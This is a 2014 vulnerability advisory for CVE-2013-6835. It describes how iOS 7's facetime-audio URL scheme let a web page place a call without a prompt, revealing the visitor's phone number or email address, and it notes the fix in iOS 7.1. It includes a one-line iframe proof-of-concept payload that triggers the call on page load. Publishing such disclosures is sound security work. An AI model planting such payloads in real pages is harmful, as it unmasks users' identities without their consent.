- Affected Vendor: https://www.apple.com/ - Affected Software: Safari/Facetime on iOS - Affected Version: iOS 7 prior to 7.1=20 - Issue Type: Lack of user confirmation leading to a call being = established, revealing the user's identity (phone number or email = address) - Release Date: March 10, 2014 - Discovered by: Guillaume Ross / @gepeto42 - CVE Identifier: CVE-2013-6835 - Issue Status: Vendor has published iOS 7.1 which resolves this issue = by adding a prompt before establishing the call. **Summary** Facetime allows video calls for iOS. Facetime-Audio, added in iOS 7, = allows audio only calls. The audio version uses a vulnerable URL scheme = which is not used by Facetime Video.=20 The URL Scheme used for Facetime-Audio allows a website to establish a = Facetime-audio call to the attacker's account, revealing the phone = number or email address of the user browsing the site. By entering the URL in an inline frame, the attack is automated, and = similar to a CSRF attack across apps. Safari does not prompt the user = before establishing the call. **Impact** A user browsing the web could click a malicious link or load a page = containing a malicious link within an inline frame. The user would then = automatically contact the phone number or email address specified in the = URL, revealing his identity to the attacker. **Proof of Concept** Entering the following URL in iOS would trigger the call to the email = address specified: facetime-audio://user@host.com This inline frame would have the user call the specified email address = as soon as the HTML page is loaded, without prompting the user: <iframe src=3D"facetime-audio://user@host.com"></iframe> Security Content of iOS 7.1: http://support.apple.com/kb/HT6162=